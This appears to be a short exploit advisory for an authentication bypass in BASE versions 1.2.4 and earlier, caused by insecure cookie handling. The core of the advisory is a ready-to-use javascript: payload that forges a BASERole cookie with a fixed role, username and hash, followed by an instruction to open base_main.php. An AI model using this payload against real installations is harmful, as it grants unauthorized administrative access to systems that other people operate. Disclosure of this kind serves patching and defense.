BASE versions 1.2.4 and below suffer from an insecure cookie handling vulnerability that allows for authentication bypass.
db98ce9103110ce30c441adea7a812985dffff8948d4781a8141573f0e2d9671
Authentication Bypass in BASE version 1.2.4 and prior - Insecure
Cookie Handling Vulnerability
--------------------------------------------
Author.: Tim Medin
Contact: nidem.nidem [at] gmail [d0t] com
-------------------------------------------------------------------------------------------------
Exploit: javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e;
path=/";
Note: After creating cookie go to http://[website]/base_main.php